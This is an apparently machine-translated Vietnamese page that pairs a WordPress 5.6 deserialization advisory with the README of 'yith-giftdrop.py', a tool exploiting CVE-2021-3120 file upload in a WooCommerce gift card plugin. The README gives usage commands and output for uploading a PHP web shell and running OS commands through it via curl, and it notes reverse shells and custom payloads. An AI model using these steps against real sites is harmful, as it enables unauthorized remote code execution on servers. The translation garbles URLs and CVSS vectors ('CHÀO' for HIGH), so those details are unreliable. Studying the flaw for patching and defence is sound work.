Khai thác wordpress 5.6 trên github

WordPress dễ bị lỗ hổng cho phép kẻ tấn công từ xa chèn và thực thi mã tùy ý vì ứng dụng không làm sạch đầu vào do người dùng cung cấp trước khi được chuyển đến hàm PHP unserialize(). Những kẻ tấn công có thể khai thác sự cố này để thực thi mã PHP tùy ý trong ngữ cảnh của quy trình máy chủ web bị ảnh hưởng. Phiên bản WordPress 5. 6. x từ 5. 6 trở lên (và bao gồm) 5. 6. 3 dễ bị tổn thương

khắc phục

Cập nhật lên phiên bản WordPress 5. 6. 4 hoặc mới nhất

Người giới thiệu

https. //github. com/JamesGeee/CVE-2020-36326

https. //wordpress. org/support/wordpress-version/version-5-6-4/

Lỗ hổng liên quan

Plugin WordPress InBoundio Marketing Tải lên tệp tùy ý (2. 0. 3)

Plugin WordPress Tải xuống tệp Ghost tùy ý (0. 5. 5)

Plugin WordPress Biểu mẫu liên hệ Email Cross-Site Scripting (1. 0)

Plugin WordPress Tập lệnh chéo trang thực sự đơn giản (1. 4)

WordPress Plugin Carousel trình chiếu Tải lên tệp tùy ý (3. 11)

mức độ nghiêm trọng

Cao

phân loại

CVE-2018-19296 CVE-2020-36326 CWE-915 CVSS. 3. 1/AV. không áp dụng. L/PR. N/UI. Không áp dụng. U/C. CHÀO. H/A. h

thẻ

Thiếu cập nhật

wordpress joomla pentesting wordpress-khai thác-framework lỗ hổng bảo mật-phát hiện lỗ hổng công cụ hack-máy quét vuln tự động khai thác trang web-hack pentesting-tools auto-khai thác pentesting-tool vulnnr vuln-finder uscan

  • Cập nhật13/06/2022
  • con trăn

abdul aziz / wordpress-khai thác-and-google-dork-finder

Sao 5

  • Mã số
  • Vấn đề
  • Yêu cầu kéo

Bộ công cụ này bao gồm hai tùy chọn đầu tiên là sử dụng các khai thác từ báo chí hiện có để tìm các trang web dễ bị tấn công hoặc tùy chọn thứ hai sử dụng google dork tùy chỉnh để tìm các trang web dễ bị tấn công

Công cụ kiểm tra cũng như khai thác lỗ hổng CVE-2021-3120, Arbitrary File Upload trong YITH WooCommerce Gift Cards Premium phiên bản 3. 3. 0 trở xuống

Một Lời Cảnh Báo

Vui lòng không chạy công cụ này trên các hệ thống mà bạn không có quyền kiểm tra. Làm như vậy là bất hợp pháp và bạn có thể bị truy tố bất chấp ý định tốt nhất của bạn. Nếu bạn là người đam mê CNTT/an ninh mạng và bạn tò mò về cách thức hoạt động của công cụ này, tôi khuyên bạn nên thiết lập môi trường phòng thí nghiệm của riêng mình để thử nghiệm công cụ này

Mô tả lỗ hổng

Một lỗ hổng nghiêm trọng (CVSSv3 9. 8) tồn tại trong plugin WordPress "YITH WooCommerce Gift Cards Premium" phiên bản 3. 3. 0 trở xuống, cho phép kẻ tấn công tải các tệp tùy ý lên máy chủ và do đó thực thi mã từ xa trên hệ điều hành máy chủ trong ngữ cảnh bảo mật của máy chủ web

Plugin cho phép thêm các sản phẩm thẻ quà tặng vào trang web (được cung cấp bởi plugin WordPress WooC Commerce) và cung cấp tính năng tùy chọn cho phép khách hàng mua thẻ quà tặng với thiết kế tùy chỉnh bằng cách tải lên hình ảnh họ chọn khi đặt sản phẩm thẻ quà tặng vào giỏ hàng. Tệp được gửi qua tham số tệp "ywgc-upload-picture" của yêu cầu POST, tuy nhiên, máy chủ không thực hiện bất kỳ kiểm tra chính xác nào trước khi xử lý yêu cầu và lưu trữ tệp ở vị trí có thể dự đoán được trên máy chủ, với vị trí do máy khách chỉ định . Có thể dễ dàng thực thi mã bằng cách tải lên tệp PHP với. php và sau đó yêu cầu tệp tại vị trí đã tải lên

Cũng cần lưu ý rằng lỗ hổng này có thể bị khai thác bất kể tính năng thiết kế thẻ quà tặng tùy chỉnh có được bật hay không. Điều kiện duy nhất để khai thác lỗ hổng này là khả năng thêm thẻ quà tặng vào giỏ hàng

Chi tiết lỗ hổng

Tên lỗ hổngTải lên tệp tùy ý dẫn đến thực thi mã từ xaCVECVE-2021-3120CVSS VectorCVSS. 3. 0/AV. không áp dụng. L/PR. N/UI. Không áp dụng. U/C. CHÀO. H/A. CVSS Điểm 9. 8 (Quan trọng)Nhà cung cấpYITHSản phẩm bị ảnh hưởngYITH Thẻ quà tặng WooC Commerce cao cấpTrang sản phẩmhttps. //yithemes. com/themes/plugins/yith-wooc Commerce-gift-cards/Phiên bản bị ảnh hưởngVersion 3. 3. 0 trở xuốngPhiên bản cố địnhv3. 3. 1

Phiên bản 3. 1. 5 và phiên bản 3. 3. 0 đã được sử dụng để thử nghiệm và được phát hiện là dễ bị tổn thương. Môi trường phòng thí nghiệm đang chạy WordPress 5. 6 và WooC Commerce 4. 8. 0

Giới thiệu về công cụ này

Công cụ này được viết để tự động phát hiện các trang web WordPress có thể bị ảnh hưởng bởi sự cố này. Nó làm như vậy bằng cách thực hiện liệt kê phiên bản bằng cách sử dụng thông tin có trong readme. txt được bao gồm trong plugin theo mặc định

Ngoài ra, nó có khả năng thực hiện kiểm tra bằng chứng về khái niệm bằng cách tải lên một tập lệnh php đơn giản với tên được tạo ngẫu nhiên. Tập lệnh chứa lệnh echo đơn giản, lệnh này khi được yêu cầu sẽ được sử dụng để xác nhận việc thực thi mã. Vì tệp đã tải lên sẽ vẫn còn trên máy chủ, tên tệp được tạo ngẫu nhiên sẽ giúp giảm khả năng tệp được người khác yêu cầu và tập lệnh cũng sẽ không gây hại cho máy chủ

Công cụ này cũng có thể được sử dụng để khai thác lỗ hổng này. Cuộc tấn công mặc định là tải lên một web shell PHP đơn giản. Điều này có thể được sử dụng để thực thi các lệnh hệ điều hành khác, bao gồm cả shell đảo ngược. Đối với các kịch bản "thú vị" hơn, bạn có thể chỉ định tải trọng tùy chỉnh cũng như tên tệp tùy chỉnh để bỏ qua các hạn chế phía máy chủ hơn nữa

Cài đặt

Chỉ cần sao chép kho lưu trữ hoặc tải xuống yith-giftdrop. tập tin py để chạy

Cách sử dụng

Để thực hiện kiểm tra lỗ hổng thông qua liệt kê phiên bản, hãy chỉ định url của sản phẩm thẻ quà tặng (-u) và chế độ liệt kê (-e). Đây hoàn toàn là thu thập thông tin và không thực hiện bất kỳ thao tác tải tệp nào lên

$ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -e
Info: Found plugin via readme.txt
Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.

Để thực hiện bằng chứng về khái niệm, hãy sử dụng tùy chọn -c. Điều này sẽ để lại một tệp PHP trên máy chủ, vì vậy một cảnh báo sẽ được hiển thị để thông báo cho bạn về điều này và chương trình sẽ thoát vào thời điểm này. Bạn sẽ cần thêm cờ -a hoặc --accept để xác nhận rằng bạn đã hiểu điều này và muốn tiếp tục

$ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -c -a
Info: Found plugin via readme.txt
Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.
Info: Preparing for upload...
Info: Uploaded file to: http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/7eb0273842554d6e9db937be07faf270.php
Info: Received expected response at payload url. CODE EXECUTION confirmed!

Theo mặc định, công cụ sẽ cố gắng tải lên trình bao web cơ bản. Một lần nữa, bạn sẽ cần thêm cờ -a hoặc chấp nhận để xác nhận rằng bạn muốn tiếp tục

$ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -a
Info: Found plugin via readme.txt
Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.
Info: Preparing for upload...
Info: Payload uploaded to: http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php
Info: Default payload (OS Command Execution) is used. Try below to obtain server hostname:
Info:     curl http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php?cmd=hostname
$ curl http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Đối với các mục đích sử dụng khác của công cụ, bao gồm việc sử dụng tên tệp và tải trọng tùy chỉnh, hãy xem màn hình trợ giúp